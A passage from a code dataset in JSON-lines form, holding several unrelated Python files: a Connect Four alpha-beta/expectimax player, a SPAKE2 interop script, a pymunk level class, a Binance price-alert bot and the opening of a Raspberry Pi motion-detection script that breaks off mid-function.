on\n the alpha-beta pruning algorithm\n\n This will play against either itself or a human player\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The 0 based index of the column that represents the next move\n \"\"\"\n\n MAX_DEPTH = 7\n\n # Create bitstring representation of board to improve performance\n board = Board(self.player_number, board)\n\n def max_value(board, alpha, beta, depth):\n if depth >= MAX_DEPTH or board.is_end():\n return self.evaluation_function(board)\n v = -inf\n for col in board.valid_moves():\n v = max(v, min_value(board.move(col, self.player_number), alpha, beta, depth + 1))\n if v >= beta:\n return v\n alpha = max(alpha, v)\n return v\n\n def min_value(board, alpha, beta, depth):\n if depth >= MAX_DEPTH or board.is_end():\n return self.evaluation_function(board)\n v = inf\n for col in board.valid_moves():\n v = min(v, max_value(board.move(col, self.opponent_number), alpha, beta, depth + 1))\n if v <= alpha:\n return v\n beta = min(beta, v)\n return v\n\n start_time = time.time()\n\n best_score = -inf\n best_col = None\n for col in board.valid_moves():\n v = min_value(board.move(col, self.player_number), best_score, inf, 1)\n if v > best_score:\n best_score = v\n best_col = col\n\n print('Alpha-Beta Depth={} finished in {} seconds'.format(MAX_DEPTH, time.time() - start_time))\n \n return best_col\n\n def get_expectimax_move(self, board):\n \"\"\"\n Given the current state of the board, return the next move based on\n the expectimax algorithm.\n\n This will play against the random player, who chooses any valid move\n with equal probability\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The 0 based index of the column that represents the next move\n \"\"\"\n\n # Must generate random seed because multiprocessing always uses same seed???\n np.random.seed()\n\n MAX_DEPTH = 5\n\n # Create bitstring representation of board to improve performance\n board = Board(self.player_number, board)\n\n def value(board, depth, agent):\n if depth >= MAX_DEPTH or board.is_end(): return self.evaluation_function(board)\n if agent: return max_value(board, depth + 1)\n else: return exp_value(board, depth + 1)\n\n def max_value(board, depth):\n return max([ value(board.move(col, self.player_number), depth, False) for col in board.valid_moves() ])\n\n def exp_value(board, depth):\n return np.mean([ value(board.move(col, self.opponent_number), depth, True) for col in board.valid_moves() ])\n\n start_time = time.time()\n\n best_score = -inf\n best_col = None\n for col in board.valid_moves():\n score = value(board.move(col, self.player_number), 1, False)\n if score > best_score:\n best_score = score\n best_col = col\n\n print('Expectimax Depth={} finished in {} seconds'.format(MAX_DEPTH, time.time() - start_time))\n\n return best_col\n\n ROWS, COLS = 6, 7\n SEQUENCES = []\n for delta_x, delta_y, range_x, range_y in [\n (1, 0, range(ROWS - 3), range(ROWS)), # Horizontal (-) score\n (0, 1, range(COLS), range(ROWS - 3)), # Vertical (|) score\n (1, 1, range(COLS - 3), range(ROWS - 3)), # Diagonal (\\) score\n (-1, 1, range(3, COLS), range(ROWS - 3)), # Diagonal (/) score\n ]:\n for col in range_x:\n for row in range_y:\n x = col\n y = row\n sequence = []\n for _ in range(4):\n sequence.append(1 << ((x * 7) + 5 - y)) # Get a bitmask from the row and column\n x += delta_x\n y += delta_y\n SEQUENCES.append(sequence)\n\n def evaluation_function(self, board):\n \"\"\"\n Given the current stat of the board, return the scalar value that \n represents the evaluation function for the current player\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The utility value for the current board\n \"\"\"\n\n total_score = 0\n\n # Iterate over ALL possible 4-in-a-row sequences on the game-board\n for sequence in self.SEQUENCES:\n this_score = 0\n other_score = 0\n for mask in sequence:\n if board.player & mask != 0: this_score += 1\n elif board.opponent & mask != 0: other_score += 1\n\n # Only give points for this possibility if the other player has\n # no pieces obstructing it\n if other_score == 0:\n # Add this player's score\n if this_score == 2: total_score += 1\n elif this_score == 3: total_score += 3\n elif this_score == 4: total_score += 7\n elif this_score == 0:\n # Subtract opponent's score\n if other_score == 2: total_score -= 1\n elif other_score == 3: total_score -= 3\n elif other_score == 4: total_score -= 7\n\n return total_score\n\n\nclass RandomPlayer:\n def __init__(self, player_number):\n self.player_number = player_number\n self.type = 'random'\n self.player_string = 'Player {}:random'.format(player_number)\n\n def get_move(self, board):\n \"\"\"\n Given the current board state select a random column from the available\n valid moves.\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The 0 based index of the column that represents the next move\n \"\"\"\n np.random.seed()\n valid_cols = []\n for col in range(board.shape[1]):\n if 0 in board[:,col]:\n valid_cols.append(col)\n\n return np.random.choice(valid_cols)\n\n\nclass HumanPlayer:\n def __init__(self, player_number):\n self.player_number = player_number\n self.type = 'human'\n self.player_string = 'Player {}:human'.format(player_number)\n\n def get_move(self, board):\n \"\"\"\n Given the current board state returns the human input for next move\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The 0 based index of the column that represents the next move\n \"\"\"\n\n valid_cols = []\n for i, col in enumerate(board.T):\n if 0 in col:\n valid_cols.append(i)\n\n move = int(input('Enter your move: '))\n\n while move not in valid_cols:\n print('Column full, choose from:{}'.format(valid_cols))\n move = int(input('Enter your move: '))\n\n return move\n\n","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":12446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"476605339","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function, unicode_literals\n\nfrom sys import argv, stdout, stderr\n\nfrom spake2 import params\n\nif argv[1] == b\"A\":\n from spake2 import SPAKE2_A as SPAKE2_SIDE\nelif argv[1] == b\"B\":\n from spake2 import SPAKE2_B as SPAKE2_SIDE\nelif argv[1] == b\"Symmetric\":\n from spake2 import SPAKE2_Symmetric as SPAKE2_SIDE\nelse:\n raise ValueError(\"Specify side A or B\")\n\npassword = argv[2]\n\nPARAMS = {\n 'I1024': params.Params1024,\n 'I2048': params.Params2048,\n 'I3072': params.Params3072,\n 'Ed25519': params.ParamsEd25519,\n}\n\nparam = params.ParamsEd25519\nif len(argv) > 3:\n try:\n param = PARAMS[argv[3]]\n except ValueError:\n raise ValueError(\n 'Choose a valid group to use (one of %r), got %s'\n % (list(PARAMS.keys()), param))\n\n\ns = SPAKE2_SIDE(password, params=param)\nmsg_out = s.start()\nprint(msg_out.encode(\"hex\"))\nstdout.flush()\nline = raw_input()\ntry:\n msg_in = line.decode(\"hex\")\nexcept TypeError as e:\n stderr.write(\"ERROR: Could not decode line (%s): %r\\n\" % (e, line))\n stderr.flush()\n raise e\nkey = s.finish(msg_in)\nprint(key.encode(\"hex\"))\nstdout.flush()\n","sub_path":"python-spake2-interop-entrypoint.py","file_name":"python-spake2-interop-entrypoint.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"399347231","text":"import pymunk as pm\nimport pygame as pg\nfrom Car import Car\nfrom RoadBuilder import RoadBuilder\nimport constants\nimport math\n\n\nclass Level:\n def __init__(self, space, screen, car):\n self._space = space\n self._screen = screen\n self._car = car\n self._rb = RoadBuilder(self._space)\n self._c = Car(self._space, screen)\n # different generic shapes include: rectangle, circle, and segment(line)\n self._shapes_to_draw = {'rect': [], 'circle': [], 'segment': []}\n\n def _create_road(self, vs):\n _road_body, segments = self._rb.build_road(vs, 5)\n return segments\n\n def _create_ball(self, _mass, _inertia, _x_pos, _y_pos, _radius, friction=0.9, elasticity=0.3):\n body = pm.Body(_mass, _inertia, pm.Body.DYNAMIC)\n body.position = (_x_pos, _y_pos)\n shape = pm.Circle(body, _radius, (0, 0))\n shape.friction = friction\n shape.elasticity = elasticity\n self._space.add(body)\n self._space.add(shape)\n return body, shape\n\n def draw(self):\n # draw all rectangle shapes\n for shape_list in self._shapes_to_draw['rect']:\n shape = shape_list[0]\n w, h = shape_list[2], shape_list[3]\n # creating a surface object\n surface = pg.Surface((w, h), pg.SRCALPHA)\n surface.fill(shape_list[1])\n rot = -math.degrees(shape.body.angle)\n # rotate the surface\n rotated_surface = pg.transform.rotate(surface, rot)\n # get the rect of the surface\n rect = rotated_surface.get_rect(center=shape.body.position)\n if self._car.body.position[0] > 420:\n rect.x -= self._car.body.position[0] - 420\n self._screen.blit(rotated_surface, (rect.x, rect.y))\n # draw all circle shapes\n for shape_list in self._shapes_to_draw['circle']:\n shape = shape_list[0]\n x, y = shape.body.position\n if self._car.body.position[0] > 420:\n x -= self._car.body.position[0] - 420\n pg.draw.circle(self._screen, shape_list[1], center=(x, y), radius=shape.radius)\n # draw all segment(line) shapes\n for shape_list in self._shapes_to_draw['segment']:\n shape = shape_list[0]\n left = shape.a\n right = shape.b\n if self._car.body.position[0] > 420:\n offset = self._car.body.position[0] - 420\n left = (left[0]-offset, left[1])\n right = (right[0]-offset, right[1])\n pg.draw.line(self._screen, shape_list[1], left, right, int(shape.radius)*2)\n\n def update(self):\n for val in self._shapes_to_draw.keys():\n for num, shape_list in enumerate(self._shapes_to_draw[val]):\n shape = shape_list[0]\n if shape.body.position[1] > 720:\n self._shapes_to_draw[val].pop(num)\n self._space.remove(shape)\n\n\n","sub_path":"Simluator/Level.py","file_name":"Level.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"67370890","text":"import os\nimport sys\nimport json\nfrom operator import itemgetter\nimport re\nimport memcache\nimport codecs\nimport logging\nimport sys\nimport pymysql\nimport time\nimport requests\nimport re\nimport configparser\nimport datetime\nimport redis\nroot = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ['LD_LIBRARY_PATH'] = '/usr/local/lib'\nsys.path.append(root + '/python')\n\nimport talib\nimport numpy as np\nimport ccxt # noqa: E402\n\nredis_server = redis.Redis(host='localhost', port=6379, db=0)\n\ndef get_exchange():\n\t\n\t#Read in our apikeys and accounts\n\tconfig = configparser.ConfigParser()\n\tconfig.read('/root/akeys/b.conf')\n\tconf=config['binance']\n\t\n\tbinance_api_key=config['binance']['API_KEY']\n\tbinance_api_secret=config['binance']['API_SECRET']\n\t\n\texchange = ccxt.binance({\n 'apiKey': binance_api_key,\n 'secret': binance_api_secret,\n 'enableRateLimit': True,\n 'rateLimit': 3600,\n 'verbose': False, # switch it to False if you don't want the HTTP log\n\t})\n\treturn(exchange)\n\nexchange=get_exchange()\t\n\ndef broadcast(chatid,text):\n\tconfig = configparser.ConfigParser()\n\tconfig.read('/root/akeys/b.conf')\n\ttelegram_id=config['binance']['TELEGRAM_ID']\n\ttoken = telegram_id\n\turl = \"https://api.telegram.org/\"+ token + \"/sendMessage?chat_id=\" + chatid+\"&text=\"+str(text)+\"&parse_mode=HTML\"\n\tr=requests.get(url)\n\thtml = r.content\n\ndef fetch_prices(exchange, symbol):\n\tticker = exchange.fetch_ticker(symbol.upper())\n\treturn(ticker)\n \n\ndef fetch_last_order(exchange,symbol):\n\tret=exchange.fetch_closed_orders (symbol, 1,\"\");\n\t#print(ret)\n\tif ret:\n\t\tdata=ret[-1]['info']\n\t\tside=data['side']\n\t\tprice=data['price']\n\t\tprint(\"returning: 1\")\n\telse:\n\t\tprint(\"returning: 0\")\n\t\tdata=0\n\treturn data\n\ndef die():\n\tsys.exit(\"fuck\")\n\ndef get_price(pair,start_ts,end_ts):\n\n\tp=0\n\t#try:\n\tstart_ts=start_ts+\"000\"\n\turl=\"https://api.binance.com/api/v1/klines?symbol=\"+pair+\"&startTime=\"+str(start_ts)+\"&interval=1m\"\n\tprint(url)\n\tr=requests.get(url)\n\tres = (r.content.strip())\n\tstatus = r.status_code\n\tprint(status)\n\trsi_status=''\n\tprint(res)\n\ttrades = json.loads(res.decode('utf-8'))\n\tdata=trades[0]\n\tprice=float(data[4])\n\treturn(price)\n\t#except:\n\t#\tp=1\n\ndef diff_percent(low,high):\n\tprices = [low,high]\n\tfor a, b in zip(prices[::1], prices[1::1]):\n\t\tpdiff=100 * (b - a) / a\n\tpdiff=round(pdiff,2)\n\n\treturn(pdiff)\n\ndef mojo(pair,price_now):\n\n\tmc = memcache.Client(['127.0.0.1:11211'], debug=0)\n\n\tblank=1\n\t\n\tts_now = datetime.datetime.now()\n\tts_now_ts=int(time.mktime(ts_now.timetuple()))\t\n\tts_now_human=datetime.datetime.fromtimestamp(ts_now_ts).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\tkey=str(pair)+str(\"pkey-1hour\")\n\tif(mc.get(key)):\n\t\tmc.delete(key)\n\t\n\tts_1hour = ts_now - datetime.timedelta(seconds=3600)\n\tts_1hour_ts=int(time.mktime(ts_1hour.timetuple()))\n\ttsd=datetime.datetime.fromtimestamp(ts_1hour_ts).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\n\tprice_1_hours_ago=get_price(pair,str(ts_1hour_ts),str(ts_now_ts))\n\tif price_1_hours_ago:\n\t\tprice_1_hours_ago=float(price_1_hours_ago)\n\t\tprint(\"P1HA\")\n\t\tprint(price_1_hours_ago)\n\t\tprice_now=float(price_now)\n\t\tprice_diff=diff_percent(price_1_hours_ago,price_now)\n\t\tif price_diff:\t\t\n\t\t\tmc.set(key,price_diff,86400)\n\t\t\tprint(\"ALERTS::: Price Now: \"+str(ts_now_human)+\" \"+str(price_now)+\" 1 Hour Ago \"+str(tsd)+\" : \"+str(price_1_hours_ago)+\" Diff %: \"+str(price_diff))\n\t\n\tkey=str(pair)+str(\"pkey-3hour\")\n\tif(mc.get(key)):\n\t\tmc.delete(key)\n\t\n\tts_3hour = ts_now - datetime.timedelta(seconds=10800)\n\tts_3hour_ts=int(time.mktime(ts_3hour.timetuple()))\n\ttsd=datetime.datetime.fromtimestamp(ts_3hour_ts).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\n\tprice_3_hours_ago=get_price(pair,str(ts_3hour_ts),str(ts_now_ts))\n\tif price_3_hours_ago:\n\t\tprice_3_hours_ago=float(price_3_hours_ago)\n\t\tprint(\"P3HA\")\n\t\tprint(price_3_hours_ago)\n\t\tprice_now=float(price_now)\n\t\tprice_diff=diff_percent(price_3_hours_ago,price_now)\n\t\tif price_diff:\t\t\n\t\t\tmc.set(key,price_diff,86400)\n\t\t\tprint(\"ALERTS::: Price Now: \"+str(ts_now_human)+\" \"+str(price_now)+\" 3 Hour Ago: \"+str(tsd)+\" : \"+str(price_3_hours_ago)+\" Diff %: \"+str(price_diff))\n\t\n\tkey=str(pair)+str(\"pkey-6hour\")\n\tif(mc.get(key)):\n\t\tmc.delete(key)\n\t\n\tts_6hour = ts_now - datetime.timedelta(seconds=21600)\n\tts_6hour_ts=int(time.mktime(ts_6hour.timetuple()))\n\ttsd=datetime.datetime.fromtimestamp(ts_6hour_ts).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\n\tprice_6_hours_ago=get_price(pair,str(ts_6hour_ts),str(ts_now_ts))\n\tif price_6_hours_ago:\n\t\tprice_6_hours_ago=float(price_6_hours_ago)\n\t\tprint(\"P6HA\")\n\t\tprint(price_6_hours_ago)\n\t\tprice_now=float(price_now)\n\t\tprice_diff=diff_percent(price_6_hours_ago,price_now)\n\t\tif price_diff:\t\t\n\t\t\tmc.set(key,price_diff,86400)\n\t\t\tprint(\"ALERTS::: Price Now: \"+str(ts_now_human)+\" \"+str(price_now)+\" \"+str(price_now)+\" 6 Hour Ago: \"+str(tsd)+\" : \"+str(price_6_hours_ago)+\" Diff %: \"+str(price_diff))\n\t\n\tkey=str(pair)+str(\"pkey-12hour\")\n\tif(mc.get(key)):\n\t\tmc.delete(key)\n\t\n\tts_12hour = ts_now - datetime.timedelta(seconds=43200)\n\tts_12hour_ts=int(time.mktime(ts_12hour.timetuple()))\n\n\ttsd=datetime.datetime.fromtimestamp(ts_12hour_ts).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\n\tprice_12_hours_ago=get_price(pair,str(ts_12hour_ts),str(ts_now_ts))\n\tif price_12_hours_ago:\n\t\tprice_12_hours_ago=float(price_12_hours_ago)\n\t\t\n\t\tprint(\"P12HA\")\n\t\tprint(price_12_hours_ago)\n\t\tprice_now=float(price_now)\n\t\tprice_diff=diff_percent(price_12_hours_ago,price_now)\n\t\tif price_diff:\t\t\n\t\t\tmc.set(key,price_diff,86400)\n\t\t\tprint(\"ALERTS::: Price Now: \"+str(ts_now_human)+\" \"+str(price_now)+\" 12 Hour Ago: \"+str(tsd)+\" : \"+str(price_12_hours_ago)+\" Diff %: \"+str(price_diff))\n\t#except:\n\t#\tprint(\"\")\n\t#sys.exit(\"Die\")\n\ndef get_rsi(pair,interval):\n\n\tarr = []\n\tout = []\n\tfin = []\n\turl=\"https://api.binance.com/api/v1/klines?symbol=\"+pair+\"&interval=\"+interval+\"&limit=500\"\n\tprint(url)\n\tr=requests.get(url)\n\tres = (r.content.strip())\n\tstatus = r.status_code\n\tprint(\"Status: \"+str(status))\n\trsi_status=''\n\tprint(\"DBRSI: \"+str(res))\n\ttrades = json.loads(res.decode('utf-8'))\n\n\tlp=0\n\tfor trade in trades:\n\t\topen_price=float(trade[0])\n\t\tclose_price=float(trade[4])\n\t\thigh_price=float(trade[2])\n\t\tlow_price=float(trade[3])\n\t\tif close_price>0 and close_price!=lp:\n\t\t\tarr.append(close_price)\t\n\t\tlp=close_price\n\n\tnp_arr = np.array(arr,dtype=float)\n\toutput=talib.RSI(np_arr,timeperiod=15)\n\n\tfor chkput in output:\n\t\tif chkput>0:\n\t\t\tfin.append(chkput)\n\t\t\n\trsi=float(fin[-1])\n\trsi=round(rsi)\n\treturn(rsi)\n\ndef fetch_order_book(exchange,symbol,type,qlimit):\n\tlimit = 1000\n\tret=exchange.fetch_order_book(symbol, limit)\n\n\tif type=='bids':\n\t\tbids=ret['bids']\n\t\treturn bids\n\telse:\n\t\tasks=ret['asks']\n\t\treturn asks\n\ndef main():\n\t\n\tfrom datetime import date\n\ttickers=exchange.fetchTickers()\n\tmc = memcache.Client(['127.0.0.1:11211'], debug=0)\n\tfor coin in tickers:\n\n\t\tfirst=0\n\t\tskip=1\n\t\tbroadcast_message=0\n\t\tprice_jump=0\n\t\tcoin=str(coin)\n\t\trsi=100\n\t\tbtc_price=float(tickers['BTC/USDT']['close'])\n\t\tbtc_percent=float(tickers['BTC/USDT']['percentage'])\n\n\t\tsymbol=tickers[coin]['info']['symbol']\n\t\tcsymbol=coin\n\t\tcsymbol=csymbol.replace(\"/\",\"_\",1)\n\t\tdet=int(0)\n\t\ttoday = str(date.today())\n\t\t\n\t\tif 'USDT' in symbol:\n\t\t\tmin_vol=1000000\n\t\t\tskip=0\n\t\telif 'BTC' in symbol:\n\t\t\tmin_vol=500\n\t\t\tskip=0\n\t\telif 'BNB' in symbol:\n\t\t\tmin_vol=50000\n\t\t\t\n\t\tkey = str(date.today())+str('ALERTS-LAST_PRICE')+str(csymbol)\n\t\t\n\t\tlast_price=0\n\t\tif mc.get(key):\n\t\t\tlast_price=mc.get(key)\n\t\t\t#print(\"ALERTS DB: GOT LP: \"+str(last_price))\n\t\telse:\n\t\t\tfirst=1\n\t\t\t\n\t\tdata=str()\n\t\trow=tickers[coin]\n\t\tsymbol=row['info']['symbol']\n\t\tclose=row['close']\n\t\tpercent=row['percentage']\n\t\tlow=row['low']\n\t\thigh=row['high']\n\t\tqv=row['quoteVolume']\n\t\tprice=close\n\t\tdprint=1\n\t\tpair=symbol\n\t\tour_percent=0\n\t\tlast_price=0\n\t\t\n\t\tif skip!=1 and qv >=min_vol:\n\t\t\t\n\t\t\tprices = [low,high]\n\t\t\tfor a, b in zip(prices[::1], prices[1::1]):\n\t\t\t\tpdiff=100 * (b - a) / a\n\t\t\t\n\t\t\tpdiff=round(pdiff,2)\n\t\t\t\t\n\t\t\tspread=pdiff\n\n\t\t\tpair=symbol\n\n\t\t\tif last_price>0:\n\t\t\t\tprint(\"DBLP: \"+str(last_price))\n\t\t\t\tprint(\"PRICE: \"+str(price))\n\t\t\t\tdarr = [last_price,price]\n\t\t\t\tfor a, b in zip(darr[::1], darr[1::1]):\n\t\t\t\t\tprice_jump=100 * (b - a) / a\n\t\t\t\t\tprice_jump=round(price_jump,2)\n\n\t\t\tif percent>1 and price_jump>0.10 or percent>1 and first==1:\n\t\n\t\t\t\tkey = str(date.today())+str('ALERTSDB')+str(csymbol)\n\t\t\t\tif mc.get(key):\n\t\t\t\t\tdprint=2\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ALERTS DEBUG::: LP: \"+str(last_price)+\" P: \"+str(price)+\" D: \"+str(price_jump))\n\t\n\t\t\t\t\tdet=int(1)\n\t\t\t\t\tmc.set(key,1,120)\n\t\t\t\t\t\n\t\t\t\t\ttry:\n\t\t\t\t\t\trsi_3m=get_rsi(symbol,'3m')\n\t\t\t\t\t\trsi_5m=get_rsi(symbol,'5m')\n\t\t\t\t\t\trsi_stats=\"RSI 3M: \"+str(rsi_3m)+\" RSI 5M: \"+str(rsi_5m)\n\t\t\t\t\t\tmojo(symbol,close)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tkey=str(pair)+str(\"pkey-1hour\")\n\t\t\t\t\t\tif mc.get(key):\n\t\t\t\t\t\t\tone_hours=mc.get(key)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tone_hours=0\n\n\t\t\t\t\t\tkey=str(pair)+str(\"pkey-3hour\")\n\t\t\t\t\t\tif mc.get(key):\n\t\t\t\t\t\t\tthree_hours=mc.get(key)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tthree_hours=0\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tkey=str(pair)+str(\"pkey-6hour\")\n\t\t\t\t\t\tif mc.get(key):\n\t\t\t\t\t\t\tsix_hours=mc.get(key)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tsix_hours=0\n\t\t\t\t\t\t\n\t\t\t\t\t\tkey=str(pair)+str(\"pkey-12hour\")\n\t\t\t\t\t\tif mc.get(key):\n\t\t\t\t\t\t\ttwelve_hours=mc.get(key)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttwelve_hours=0\n\t\t\t\t\n\t\t\t\t\t\tlink='https://www.binance.com/en/trade/pro/'+csymbol\n\t\t\t\t\t\talert_type=':::PRICE ALERT: '+str(percent)+'%:::'\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tdata_add=\"1H: \"+str(one_hours)+str('%')+\", 3H: \"+str(three_hours)+str('%')+\", 6H: \"+str(six_hours)+\"%, 12H: \"+str(twelve_hours)+str('%')\n\t\t\t\t\t\tdata=''+str(symbol)+str(alert_type)+\"\\nPrice: \"+str(close)+' ('+str(percent)+'%)' + \"\\nSpread: \"+str(pdiff)+\"%\\nBTC Price: \"+str(btc_price)+' ('+str(btc_percent)+'%'+')'+\"\\n\"+str(rsi_stats)+\"\\n\"+str(data_add)+\"\\n\"+str(link)\n\n\t\t\t\t\t\ttimestamp=time.time()\n\t\t\t\t\t\tts_raw=timestamp\n\t\t\t\t\t\tdate_time=datetime.datetime.fromtimestamp(timestamp).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\t\t\t\tdate_today=str(date.today())\t\t\t\t\t\t\t\n\t\t\t\t\t\talert_key_all=str(date_today)+'-NALERTS'\n\t\t\t\t\t\talert_key_symbol=str(date_today)+str(symbol)+'-NALERTS'\n\t\t\t\t\t\talert_list_today=str(date_today)+'-NALERTLIST'\n\t\t\t\t\t\tsymbol_ids=str(symbol)+'-NIDS'\n\t\t\t\t\t\tsymbol_hash_detailed=str(symbol)+'-'+str(ts_raw)\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tdata=str(data)+\"\\n\\nThis Alert Was Sent AT: \"+str(date_time)+\" GMT\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tpdata=str(date_time)+\"\\t\"+str(price)+\"\\t\"+str(percent)\n\t\t\t\t\t\tredis_server.rpush(alert_key_all,pdata)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tredis_server.sadd(alert_list_today,symbol)\n\n\t\t\t\t\t\t#Add Unique Timestamp to list for this symbol, will use as identifer for hash later\n\t\t\t\t\t\tredis_server.sadd(symbol_ids,ts_raw)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tdetail_hash = {\"date\":str(date_today),\n\t\t\t\t\t\t\"date_time\":str(date_time), \n\t\t\t\t\t\t\"symbol\":str(symbol), \n\t\t\t\t\t\t\"alert_type\":str(alert_type), \n\t\t\t\t\t\t\"price\":float(price), \n\t\t\t\t\t\t\"percent\":float(percent), \n\t\t\t\t\t\t\"high\":str(high), \n\t\t\t\t\t\t\"low\":str(low), \n\t\t\t\t\t\t\"volume\":int(qv),\n\t\t\t\t\t\t\"spread\":float(spread),\n\t\t\t\t\t\t\"rsi_3mins\":float(rsi_3m),\n\t\t\t\t\t\t\"rsi_5mins\":float(rsi_5m),\n\t\t\t\t\t\t\"btc_price\":str(btc_price),\n\t\t\t\t\t\t\"btc_percent\":str(btc_percent),\n\t\t\t\t\t\t\"link\":str(link),\n\t\t\t\t\t\t}\n\t\t\n\t\t\t\t\t\tprint(\"Writing detailed alert hash data to: \"+str(symbol_hash_detailed))\n\t\t\t\t\t\tprint(detail_hash)\n\t\t\t\t\t\tredis_server.hmset(symbol_hash_detailed, detail_hash)\n\n\t\t\t\t\t\tprint(\"Pushing coin to todays alert list: \"+str(symbol))\n\t\t\t\t\t\tprint(data)\n\n\t\t\t\t\t\tkey = str(date.today())+str('ALERTS-LAST_PRICE')+str(csymbol)\n\t\t\t\t\t\tmc.set(key,price,86400)\n\n\t\t\t\t\t\t#broadcast('693711905',data)\t\n\t\t\t\t\t\t#broadcast('420441454',data)\t\n\t\t\t\t\t\t#broadcast('446619309',data)\t\n\t\t\t\t\t\t#broadcast('490148813',data)\t\n\t\t\t\t\t\t#broadcast('110880375',data)\t\n\t\t\t\t\t\t#broadcast('699448304',data)\t\n\t\t\t\t\t\t#broadcast('593213791',data)\t\n\t\t\t\t\t\t#broadcast('506872080',data)\t\n\t\t\t\t\t\t#broadcast('543018578',data)\n\t\t\t\t\t\t#broadcast('503482955',data)\n\t\t\t\t\t\ttime.sleep(10)\t\n\t\t\t\t\t\t#broadcast('429640253',data)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"threw error\")\n\t\t\t\t\t\ttime.sleep(5)\n\t\t\t\t\nwhile True:\n\t#try:\n\tmain()\n\t#except:\n\t#print(\"error\")\n\ttime.sleep(5)\n","sub_path":"bots/alerts2.py","file_name":"alerts2.py","file_ext":"py","file_size_in_byte":11835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"78039573","text":"#changed 8-12-2018\n#V1\ntry:\n import cv2\nexcept Exception as e:\n print(\"Warning: OpenCV not installed. To use motion detection, make sure you've properly configured OpenCV.\")\n\nimport time\nimport _thread\nimport threading\nimport atexit\nimport sys\nimport termios\nimport contextlib\nimport picamera\nimport picamera.array\nimport numpy as np\nimport io\n\nimport imutils\nimport RPi.GPIO as GPIO\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor\n\n\n### User Parameters ###\n\nMOTOR_X_REVERSED = True\n\nMAX_STEPS_X = 30\n\nRELAY_PIN = 22\n\n\noutput = np.empty((240, 320, 3), dtype = np.uint8)\n\n#######################\n\n\n@contextlib.contextmanager\ndef raw_mode(file):\n \"\"\"\n Magic function that allows key presses.\n :param file:\n :return:\n \"\"\"\n old_attrs = termios.tcgetattr(file.fileno())\n new_attrs = old_attrs[:]\n new_attrs[3] = new_attrs[3] & ~(termios.ECHO | termios.ICANON)\n try:\n termios.tcsetattr(file.fileno(), termios.TCSADRAIN, new_attrs)\n yield\n finally:\n termios.tcsetattr(file.fileno(), termios.TCSADRAIN, old_attrs)\n\n\nclass VideoUtils(object):\n \"\"\"\n Helper functions for video utilities.\n \"\"\"\n def __init__(self, camera):\n self.camera = camera\n self.prev_frame = ''\n self.tempFrame = ''\n\n def rasp_find_motion(self, stream, callback=0):\n\n frame = stream\n\n # resize the frame, convert it to grayscale, and blur it\n frame = imutils.resize(frame, width=500)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n\n # if the first frame is None, initialize it\n if self.prev_frame == '':\n self.prev_frame = gray\n self.tempFrame = gray\n return\n else:\n delta = cv2.absdiff(self.tempFrame, gray)\n self.tempFrame = gray\n tst = cv2.threshold(delta, 5, 255, cv2.THRESH_BINARY)[1]\n tst = cv2.dilate(tst, None, iterations=2)\n print (\"Done.\\n Waiting for motion.\")\n if not cv2.countNonZero(tst) > 0:\n self.prev_frame = gray\n else:\n print ('not done')\n\n # compute the absolute difference between the current frame and\n # first frame\n frameDelta = cv2.absdiff(self.prev_frame, gray)\n 